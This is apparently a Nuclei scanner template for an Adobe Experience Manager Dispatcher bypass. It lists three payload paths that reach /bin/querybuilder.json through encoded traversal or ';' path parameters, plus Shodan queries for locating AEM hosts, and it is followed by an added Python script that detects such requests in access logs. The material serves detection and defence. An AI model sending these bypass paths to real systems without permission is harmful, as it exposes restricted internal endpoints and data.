Vulnerability Description
Detected potential Adobe Experience Manager (AEM) Dispatcher misconfigurations that could have allowed bypassing request filtering, exposing internal endpoints, or permitting unauthorised access to restricted resources.
id: aem-dispatcher-bypass

info:
  name: Adobe Experience Manager - Dispatcher Bypass
  author: DhiyaneshDK,assetnote
  severity: medium
  description: |
    Detected potential Adobe Experience Manager (AEM) Dispatcher misconfigurations that could have allowed bypassing request filtering, exposing internal endpoints, or permitting unauthorised access to restricted resources.
  reference:
    - https://docs.google.com/presentation/d/1PypHgd0r3ZVII7e5fLX5JjZIJQfAsMEydLnug0yFb9k/edit?usp=sharing (Slide 18,22,24)
  metadata:
    verified: true
    max-request: 1
    vendor: adobe
    product: experience_manager
    shodan-query:
      - http.title:"aem sign in"
      - http.component:"adobe experience manager"
      - cpe:"cpe:2.3:a:adobe:experience_manager"
  tags: adobe,aem,dispatcher

http:
  - raw:
      - |
        GET {{paths}} HTTP/1.1
        Host: {{Hostname}}

    # Each path targets /bin/querybuilder.json, either behind an encoded
    # traversal or with a ';' path parameter appended.
    payloads:
      paths:
        - "/graphql/execute.json/..%2f../bin/querybuilder.json"
        - "/bin/querybuilder.json;x='x/.ico/y'"
        - "/bin/querybuilder.json;x='x/graphql/execute/json/y'"

    stop-at-first-match: true

    # Report only when the response is a 200 and its body contains all three fields.
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"success":true'
          - '"results":'
          - '"hits":'
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100da86498b595a02839334744f5212bd29f0ec61431ba75b629567ec5f31b01da2022100c4da75bfb6ebc7569769c8cf9c9b75d1195b934b6761fbf539bd4ba8f11336b3:922c64590222798bb761d5b6d8e72950
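
The same request shapes can be looked for in existing access logs. The following is an added example, not part of the template or of any Adobe or ProjectDiscovery code: it reduces each logged request target to the path it could resolve to and reports requests that reach /bin/querybuilder.json in disguised form, separating those answered with 200 from those that were blocked. The combined log format, the normalisation heuristic (which is not the Dispatcher's or AEM's own parsing), the function names and the sample log lines are assumptions made for illustration.

```python
import posixpath
import re
from urllib.parse import unquote

# Assumption: combined-format access log from the web tier in front of AEM.
LINE_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# Endpoint that the template's payload paths try to reach.
SENSITIVE = {"/bin/querybuilder.json"}


def effective_path(target):
    """Heuristic view of where a request could land: drop the query string and
    any ';' path parameter, decode %XX once, then collapse '..' segments."""
    path = target.split("?", 1)[0].split(";", 1)[0]
    return posixpath.normpath(unquote(path))


def classify(line):
    """Return (verdict, target) for a log line, or None if it is not relevant.
    verdict is 'direct', 'disguised-served' or 'disguised-blocked'."""
    m = LINE_RE.search(line)
    if not m or effective_path(m["target"]) not in SENSITIVE:
        return None
    raw_path = m["target"].split("?", 1)[0]
    if raw_path in SENSITIVE:
        return ("direct", m["target"])
    served = m["status"] == "200"  # mirrors the template's status matcher
    return ("disguised-served" if served else "disguised-blocked", m["target"])


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2025:10:00:00 +0000] "GET /content/site/en.html HTTP/1.1" 200 5120
192.0.2.44 - - [01/Jan/2025:10:00:03 +0000] "GET /bin/querybuilder.json?path=/content HTTP/1.1" 404 312
192.0.2.44 - - [01/Jan/2025:10:00:04 +0000] "GET /graphql/execute.json/..%2f../bin/querybuilder.json HTTP/1.1" 200 2048
192.0.2.44 - - [01/Jan/2025:10:00:05 +0000] "GET /bin/querybuilder.json;x='x/.ico/y' HTTP/1.1" 403 199
"""


def scan(log_text):
    """Classify every line and keep only the relevant hits, in log order."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]


if __name__ == "__main__":
    for verdict, target in scan(SAMPLE_LOG):
        print(f"{verdict:18} {target}")
```

A 'disguised-served' hit corresponds to what the template reports; the response body should then be checked against the template's three word matchers before treating it as confirmed.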